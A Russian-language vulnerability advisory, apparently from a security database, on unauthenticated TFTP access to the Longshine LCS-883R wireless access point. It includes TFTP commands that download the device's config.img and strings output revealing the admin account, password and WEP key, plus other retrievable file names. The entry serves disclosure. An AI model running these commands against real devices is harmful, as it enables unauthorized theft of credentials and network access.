Неавторизованный доступ через TFTP интерфейс к Longshine WLAN Access-Point

Дата публикации:
10.01.2003
Дата изменения:
17.10.2006
Всего просмотров:
726
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Обнаруженная уязвимость в Longshine WLAN Access-Point LCS-883R позволяет атакующему загрузить конфигурацию устройства через tftp, не зная WEP Secret. Также атакующий может получить неавторизованный доступ к паролю администратора RADIUS сервера. Это "нападение" работает через WLAN (!!!) и Ethernet. Пример :
tftp
tftp> connect 192.168.108.48
tftp> get config.img
Received 780 bytes in 1.0 seconds
tftp> quit

[~]/-\>strings config.img 
DNXLABAP01 <- name of the AP
root       <- name of the superuser
XXXXXX123  <- password from superuser
DNXLABLAN  <- ssid
secu9      <- secret for WEP
7890abcdef <-
Также можно загрузить следующие файлы - config.img, wbtune.dat, mac.dat, rom.img, normal.img Уязвимость обнаружена в Longshine LCS-883R-AC-B External WLAN Access Point 22 Mbps и ThreadX ARM7/Green Hills Version G3.0f.3.0c from Express Logic Inc.

Ссылки: Longshine WLAN Access-Point LCS-883R VU#310201
или введите имя

CAPTCHA